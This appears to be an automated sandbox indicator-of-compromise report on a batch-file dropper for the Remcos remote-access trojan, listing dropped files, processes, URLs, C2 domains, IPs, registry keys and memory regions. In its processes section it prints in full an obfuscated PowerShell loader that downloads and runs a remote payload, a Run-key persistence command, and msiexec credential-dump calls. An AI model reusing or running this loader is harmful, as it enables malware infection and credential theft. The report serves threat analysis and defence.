IOC Report
rIMGTR657365756.bat

loading gif

Files

File Path
Type
Category
Malicious
rIMGTR657365756.bat
ASCII text, with very long lines (6158), with no line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51ps21gz.2ep.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azahvgxl.fuh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctl2d2ua.rov.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgkrhyhk.deq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhvC236.tmp
Extensible storage engine DataBase, version 0x620, checksum 0xe99f2a77, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\qalgwws
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H9DE7R57L5U6XC0870LW.temp
data
dropped
C:\Users\user\AppData\Roaming\aspargessuppens.Bri
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMGTR657365756.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r ,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp) ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres (Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib edeLEmbrIDummKBellS iva ');Politiseres (Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r ,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp) ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres (Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib edeLEmbrIDummKBellS iva ');Politiseres (Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
pelele.duckdns.org
malicious
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
http://www.imvu.comr
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gpl
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://plieltd.top/l
unknown
https://miottoezanella.com
unknown
https://aka.ms/pscore6lBeq
unknown
https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
unknown
http://geoplugin.net/json.gp.
unknown
https://contoso.com/License
unknown
https://miottoezanella.com/Hovedvrket.rarXR
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://plieltd.top/nwnNBPSeuTV8.binafsksGodmiottoezanella.com/nwnNBPSeuTV8.bin
unknown
http://www.nirsoft.net
unknown
https://aefd.nelreports.net/api/report?cat=bingaotak
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://miottoezanella.com/Hovedvrket.rar
194.76.118.27
https://plieltd.top/
unknown
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://www.google.com
unknown
https://miottoezanella.com/Hovedvrket.rarP
unknown
https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
unknown
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
unknown
http://miottoezanella.com
unknown
https://aefd.nelreports.net/api/report?cat=bingaot
unknown
https://maps.windows.com/windows-app-web-link
unknown
https://contoso.com/
unknown
https://miottoezanella.com/
unknown
https://nuget.org/nuget.exe
unknown
https://plieltd.top/nwnNBPSeuTV8.bin
104.21.56.189
https://aefd.nelreports.net/api/report?cat=bingrms
unknown
https://www.google.com/accounts/servicelogin
unknown
https://login.yahoo.com/config/login
unknown
https://aka.ms/pscore68
unknown
http://www.nirsoft.net/
unknown
http://www.imvu.comata
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.ebuddy.com
unknown
There are 36 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
pelele.duckdns.org
185.236.203.101
malicious
plieltd.top
104.21.56.189
geoplugin.net
178.237.33.50
miottoezanella.com
194.76.118.27

IPs

IP
Domain
Country
Malicious
185.236.203.101
pelele.duckdns.org
Romania
malicious
104.21.56.189
plieltd.top
United States
178.237.33.50
geoplugin.net
Netherlands
194.76.118.27
miottoezanella.com
Italy

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\hovedparts
Bagateller
HKEY_CURRENT_USER\Environment
Afgrnsningsproblemer
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Aversi
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
9E8F000
direct allocation
page execute and read and write
malicious
2253E000
stack
page read and write
malicious
1DCBFB5D000
trusted library allocation
page read and write
malicious
224FD000
stack
page read and write
malicious
6B0E000
heap
page read and write
malicious
6B40000
heap
page read and write
malicious
5C55000
trusted library allocation
page read and write
malicious
8A80000
direct allocation
page execute and read and write
malicious
2FC5000
heap
page read and write
4765000
heap
page read and write
4A7E000
stack
page read and write
6FEE000
stack
page read and write
471F000
stack
page read and write
222C0000
heap
page read and write
7370000
heap
page read and write
4760000
heap
page read and write
85A0000
heap
page read and write
8910000
heap
page read and write
68D5000
heap
page read and write
4760000
heap
page read and write
71D0000
direct allocation
page read and write
1DCADB51000
heap
page read and write
6B7A000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
6AD7000
heap
page read and write
6B89000
heap
page read and write
7980000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
224BC000
stack
page read and write
22A26000
heap
page read and write
28F0000
heap
page read and write
4F40000
trusted library allocation
page read and write
29E0000
heap
page read and write
1DCAF440000
heap
page execute and read and write
7FF8490B0000
trusted library allocation
page read and write
71F000
unkown
page read and write
72DB000
stack
page read and write
1DCAF4FD000
heap
page read and write
1DCAFAE0000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
1DCADB08000
heap
page read and write
2A34000
heap
page read and write
47A4000
heap
page read and write
22990000
heap
page read and write
4741000
heap
page read and write
22220000
direct allocation
page read and write
2AA4000
heap
page read and write
4773000
heap
page read and write
22BFC000
heap
page read and write
608000
heap
page read and write
2A34000
heap
page read and write
3210000
trusted library allocation
page read and write
4740000
heap
page read and write
1CD9CF8000
stack
page read and write
1DCADB28000
heap
page read and write
2AA5000
heap
page read and write
610000
heap
page read and write
1DCC7CF3000
heap
page read and write
2ABE000
heap
page read and write
226BE000
stack
page read and write
84E0000
trusted library allocation
page read and write
1DCAF99B000
heap
page read and write
28EF000
stack
page read and write
79F0000
trusted library allocation
page read and write
461F000
unkown
page read and write
2C30000
heap
page read and write
27DC000
stack
page read and write
474C000
heap
page read and write
31F9000
trusted library allocation
page read and write
4741000
heap
page read and write
1DCB1A95000
trusted library allocation
page read and write
7180000
direct allocation
page read and write
4A80000
heap
page readonly
4741000
heap
page read and write
1DCAD8E0000
heap
page read and write
22200000
direct allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
2A17000
stack
page read and write
4760000
heap
page read and write
763D000
heap
page read and write
4D48000
heap
page read and write
88CC000
stack
page read and write
21A60000
direct allocation
page read and write
21EAE000
stack
page read and write
4B69000
heap
page read and write
1DCAD9C0000
heap
page read and write
474C000
heap
page read and write
2B35000
stack
page read and write
7160000
direct allocation
page read and write
71A0000
direct allocation
page read and write
4741000
heap
page read and write
4740000
heap
page read and write
4750000
heap
page read and write
754E000
stack
page read and write
B28F000
direct allocation
page execute and read and write
1DCADC10000
trusted library allocation
page read and write
4756000
heap
page read and write
475C000
heap
page read and write
22991000
heap
page read and write
1DCB18A3000
trusted library allocation
page read and write
21A90000
direct allocation
page read and write
400000
system
page execute and read and write
31E4000
trusted library allocation
page read and write
711D000
stack
page read and write
400000
system
page execute and read and write
1CD9F3E000
stack
page read and write
4A98000
trusted library allocation
page read and write
4F4F000
heap
page read and write
702E000
stack
page read and write
8603000
heap
page read and write
6B84000
heap
page read and write
2227E000
stack
page read and write
22A24000
heap
page read and write
4760000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
2962000
heap
page read and write
75CE000
stack
page read and write
8A90000
trusted library allocation
page read and write
21AB0000
direct allocation
page read and write
15D000
stack
page read and write
43E000
stack
page read and write
4760000
heap
page read and write
4778000
heap
page read and write
7FF8491A0000
trusted library allocation
page read and write
2D77000
heap
page read and write
41B000
system
page execute and read and write
5259000
trusted library allocation
page read and write
4741000
heap
page read and write
2AA4000
heap
page read and write
2C20000
heap
page read and write
8607000
heap
page read and write
22B09000
heap
page read and write
2A34000
heap
page read and write
22A15000
heap
page read and write
1DCADA75000
heap
page read and write
47A4000
heap
page read and write
77F8000
trusted library allocation
page read and write
4C41000
heap
page read and write
1DCC7BB0000
heap
page execute and read and write
2E23000
heap
page read and write
31C0000
trusted library section
page read and write
4D49000
heap
page read and write
1DCC7DCF000
heap
page read and write
1DCB19B2000
trusted library allocation
page read and write
1DCC7D36000
heap
page read and write
2D9B000
stack
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
2247C000
stack
page read and write
3250000
heap
page read and write
89B7000
trusted library allocation
page read and write
4781000
heap
page read and write
1CD98FD000
stack
page read and write
4BE0000
heap
page read and write
7FF849000000
trusted library allocation
page execute and read and write
5581000
